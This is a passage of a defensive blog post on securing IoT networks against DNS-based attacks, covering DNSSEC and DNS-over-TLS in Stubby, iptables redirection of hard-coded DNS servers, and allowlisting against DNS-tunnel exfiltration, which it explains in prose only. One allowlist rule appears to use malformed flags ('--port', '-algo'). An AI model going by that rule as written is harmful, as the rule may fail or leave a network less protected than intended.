&lt;p&gt;To enable DNSSEC in Stubby edit the configuration file (&lt;code&gt;/etc/stubby/stubby.yml&lt;/code&gt; by default), and add/replace the following options.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# /etc/stubby/stubby.yml&lt;/span&gt;
&lt;span class="na"&gt;dnssec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;GETDNS_EXTENSION_TRUE&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To check that Stubby works, we repeat dig commands but specify 127.0.0.1 as the server.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;dig staex.io +dnssec @127.0.0.1 &lt;span class="c"&gt;# should resolve to the ip address&lt;/span&gt;
dig badsign-a.test.dnssec-tools.org +dnssec @127.0.0.1 &lt;span class="c"&gt;# should fail&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In all our tests the second address failed to resolve with or without &lt;code&gt;dnssec&lt;/code&gt; flag in the configuration file. We assume that it was filtered on the server side prior to reaching the client. Better safe than sorry.&lt;/p&gt;

&lt;h2&gt;
  
  
  DNS traffic encryption &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1p6u50mwp4s9rul1z44p.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1p6u50mwp4s9rul1z44p.jpg" alt="Photo by Harmen Jelle van Mourik on Unsplash." width="640" height="877"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;DNS traffic is still unencrypted even if DNSSEC is enabled, and the solution is to use either &lt;a href="https://en.wikipedia.org/wiki/DNS_over_TLS"&gt;DNS-over-TLS&lt;/a&gt; or &lt;a href="https://en.wikipedia.org/wiki/DNS_over_HTTPS"&gt;DNS-over-HTTPS&lt;/a&gt;. DoT and DoH encapsulate the packet in TLS and HTTPS frame respectively. Both protocols use state-of-the-art encryption (signed private keys obtained via public key exchange) and offer protection from replay attacks and &lt;a href="https://en.wikipedia.org/wiki/Man-in-the-middle_attack"&gt;man-in-the-middle&lt;/a&gt; attacks during initial key exchange. Both protocols are extensively used in the Internet and are regularly updated with new ciphers and other cryptographic algorithms.&lt;/p&gt;

&lt;h3&gt;
  
  
  Mitigating on the server
&lt;/h3&gt;

&lt;p&gt;Both DoH and DoT are supported by popular DNS resolvers like BIND. Configuring these protocols on the server side is out of scope of this article.&lt;/p&gt;

&lt;h3&gt;
  
  
  Mitigating on the client
&lt;/h3&gt;

&lt;p&gt;To enable DoT on the client side we again use Stubby. This name resolver uses DoT by default. If you want to change the upstream DNS server, then add the following lines to the configuration file (&lt;code&gt;/etc/stubby/stubby.yml&lt;/code&gt; by default).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# /etc/stubby/stubby.yml&lt;/span&gt;
&lt;span class="na"&gt;upstream_recursive_servers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;address_data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;9.9.9.11&lt;/span&gt;
    &lt;span class="na"&gt;tls_auth_name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;dns11.quad9.net"&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;address_data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;149.112.112.11&lt;/span&gt;
    &lt;span class="na"&gt;tls_auth_name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;dns11.quad9.net"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here we configured Quad9 servers. Other alternatives are NextDNS, Cloudflare, Google. Some of them filter malicious sites which might be useful for browsers but is not so important for IoT devices.&lt;/p&gt;

&lt;h2&gt;
  
  
  Hard-coded DNS servers &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1gc3cikfoyk31kp557h8.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1gc3cikfoyk31kp557h8.jpg" alt="Photo by Metin Ozer on Unsplash." width="640" height="960"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So far we configured encryption and signature verification for DNS traffic, and in ideal world this should be enough to protect your devices. However, some devices use a hard-coded list of DNS servers in their firmware, and do not allow us to change the firmware.&lt;/p&gt;

&lt;h3&gt;
  
  
  Mitigation
&lt;/h3&gt;

&lt;p&gt;To solve this problem we will redirect DNS traffic from those devices to Stubby. The irony is that we use the fact that legacy DNS packets can be easily rewritten and sent to another server without the client noticing.&lt;/p&gt;

&lt;p&gt;Below is a set of &lt;code&gt;iptables&lt;/code&gt; rules that will redirect any incoming traffic on port 53 to the local Stubby server. These rules are for the router.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# network interface that receives DNS packets&lt;/span&gt;
&lt;span class="nv"&gt;interface&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;br-lan
&lt;span class="c"&gt;# IP address assigned to the network interface&lt;/span&gt;
&lt;span class="nv"&gt;interface_ip_address&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.1.1
&lt;span class="c"&gt;# local stubby port&lt;/span&gt;
&lt;span class="nv"&gt;stubby_port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;53
&lt;span class="k"&gt;for &lt;/span&gt;protocol &lt;span class="k"&gt;in &lt;/span&gt;udp tcp&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
    &lt;/span&gt;iptables &lt;span class="nt"&gt;-t&lt;/span&gt; nat &lt;span class="nt"&gt;-A&lt;/span&gt; PREROUTING &lt;span class="se"&gt;\&lt;/span&gt;
        &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nv"&gt;$interface&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt; &lt;span class="nt"&gt;-s&lt;/span&gt; &lt;span class="nv"&gt;$interface_ip_address&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
        &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="nv"&gt;$protocol&lt;/span&gt; &lt;span class="nt"&gt;--dport&lt;/span&gt; 53 &lt;span class="se"&gt;\&lt;/span&gt;
        &lt;span class="nt"&gt;-j&lt;/span&gt; DNAT &lt;span class="nt"&gt;--to&lt;/span&gt; &lt;span class="nv"&gt;$interface_ip_address&lt;/span&gt;:&lt;span class="nv"&gt;$stubby_port&lt;/span&gt;
&lt;span class="k"&gt;done&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;These rules will not work for DoT and DoH, and will not work if the device in question uses non-standard DNS port. The first problem can be solve by deploying HTTPS proxy (which might not be desirable) and the second can be solved with eBPF rules. Diving into these solutions worth an article of its own.&lt;/p&gt;

&lt;h2&gt;
  
  
  DNS data exfiltration &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3xqri9sjhv03ptgdf7ix.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3xqri9sjhv03ptgdf7ix.jpg" alt="Photo by Camerauthor Photos on Unsplash." width="640" height="427"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This data exfiltration technique is rather new, but has already been exploited by various malicious programs. To use DNS queries to exfiltrate stolen data an attacker sets up a DNS resolver for his/her domain. Then on the victim's device the stolen data is encoded in subdomains of this domain: an attacker resolves subdomains and DNS servers forward the name resolution requests to the attacker's DNS server.&lt;/p&gt;

&lt;h2&gt;
  
  
  Mitigation
&lt;/h2&gt;

&lt;p&gt;One problem of this attack is that the traffic goes through perfectly secure public DNS servers and there is no 100% reliable way to detect it on the server side. However, we can easily block the data exfiltration on the client's side using a list of allowed DNS names and allowed IP addresses to which these names resolve. If a program tries to resolve a name that is not in the list, then the name resolution fails.&lt;/p&gt;

&lt;p&gt;Below is a set of rules for &lt;code&gt;iptables&lt;/code&gt; that restrict the names that are allowed to be resolved to IP addresses.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# wan interface&lt;/span&gt;
&lt;span class="nv"&gt;interface&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;eth0
iptables &lt;span class="nt"&gt;-A&lt;/span&gt; OUTPUT &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;$interface&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;-p&lt;/span&gt; udp &lt;span class="nt"&gt;--port&lt;/span&gt; 53 &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;-m&lt;/span&gt; string &lt;span class="nt"&gt;--hex-string&lt;/span&gt; &lt;span class="s2"&gt;"|05|staex|02|io"&lt;/span&gt; &lt;span class="nt"&gt;-algo&lt;/span&gt; bm &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;-j&lt;/span&gt; ACCEPT
&lt;span class="c"&gt;# 05 --- length of "staex" in hexadecimal format&lt;/span&gt;
&lt;span class="c"&gt;# 02 --- length of "io" in hexadecimal format&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Below is the script that generates a set of IP addresses to and from which the traffic is allowed. It is a good idea to run this script periodically to get DNS records' updates. Beware that DNS servers themselves need to be in the set as well.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cleanup&lt;span class="o"&gt;()&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
    &lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$ip_addresses&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;

&lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt;
&lt;span class="nb"&gt;trap &lt;/span&gt;cleanup EXIT

&lt;span class="c"&gt;# resolve hostnames&lt;/span&gt;
&lt;span class="nv"&gt;allowed_hostnames&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"dns9.quad9.net one.one.one.one"&lt;/span&gt;
&lt;span class="nv"&gt;ip_addresses&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;mktemp&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;&lt;span class="nb"&gt;hostname &lt;/span&gt;&lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nv"&gt;$allowed_hostnames&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
    &lt;/span&gt;dig +short &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$hostname&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="k"&gt;done&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$ip_addresses&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# create ipset&lt;/span&gt;
&lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;allowlist
ipset &lt;span class="nt"&gt;-exist&lt;/span&gt; create &lt;span class="nv"&gt;$name&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt;:ip
ipset flush &lt;span class="nv"&gt;$name&lt;/span&gt;
&lt;span class="k"&gt;while &lt;/span&gt;&lt;span class="nb"&gt;read&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; ip_address&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
    &lt;/span&gt;ipset add &lt;span class="nv"&gt;$name&lt;/span&gt; &lt;span class="nv"&gt;$ip_address&lt;/span&gt;
&lt;span class="k"&gt;done&lt;/span&gt; &amp;lt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$ip_addresses&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Below are &lt;code&gt;iptables&lt;/code&gt; rules that restrict the IP addresses that are allowed for inbound and outbound traffic. For these rules to work you need to disallow all inbound and outbound traffic by default. You might want to use &lt;a href="https://man7.org/linux/man-pages/man8/iptables-apply.8.html"&gt;iptables-apply&lt;/a&gt; command to not to lock yourself out of the server.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;allowlist
iptables &lt;span class="nt"&gt;-A&lt;/span&gt; INPUT &lt;span class="o"&gt;!&lt;/span&gt; &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="nt"&gt;--match-set&lt;/span&gt; &lt;span class="nv"&gt;$name&lt;/span&gt; src &lt;span class="nt"&gt;-j&lt;/span&gt; DROP
iptables &lt;span class="nt"&gt;-A&lt;/span&gt; OUTPUT &lt;span class="o"&gt;!&lt;/span&gt; &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="nt"&gt;--match-set&lt;/span&gt; &lt;span class="nv"&gt;$name&lt;/span&gt; dst &lt;span class="nt"&gt;-j&lt;/span&gt; DROP
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;These rules might not work for DNS queries that use pointers to encode names. DoT and DoH queries are also problematic. The first problem can be solved using eBPF and the second by using HTTPS proxy. Again, diving into these solutions worth an article of its own.&lt;/p&gt;

&lt;p&gt;It is worth noting that data exfiltration is the second-order threat, since an attacker needs to infiltrate the node first to steal the data. Nevertheless, it is important to have multiple layers of security — an approach encouraged by &lt;a href="https://en.wikipedia.org/wiki/Zero_trust_security_model"&gt;zero-trust security model&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Wrap-up &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbi5fft90twndsc8efji8.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbi5fft90twndsc8efji8.jpg" alt="Photo by Luismi Sánchez on Unsplash." width="640" height="475"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;DNS protocol is not secure by default, and you need to protect your devices from common attacks yourself. Implementing full protection is a huge endeavor that is best done by professionals. However, implementing «good enough» protection is manageable and can be done using the techniques from this article.&lt;/p&gt;

&lt;p&gt;Signature verification via DNSSEC and traffic encryption via DoT or DoH is a must for any serious IoT project, whereas hard-coded DNS servers and DNS data exfiltration are mostly second-order threats.&lt;/p&gt;

&lt;p&gt;Future versions of Staex will include all the mitigations mentioned in the article thus making your IoT network secure by default. &lt;a href="https://staex.io/blog/subscribe"&gt;Subscribe to our newsletter&lt;/a&gt; to be the first to know about the new features.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Originally posted on &lt;a href="https://staex.io/blog/secure-your-network-and-iot-devices-from-dns-based-attacks?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=2023-12-19"&gt;staex.io&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;We at Staex help our clients make IoT devices first-class citizens in their private networks, protect from common attacks, reduce mobile data usage, and enable audacious use cases that were not possible before. To learn more about our product please visit &lt;a href="https://staex.io/product?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=2023-12-19"&gt;this page&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>linux</category>
      <category>devops</category>
      <category>security</category>
    </item>
  </channel>
</rss>
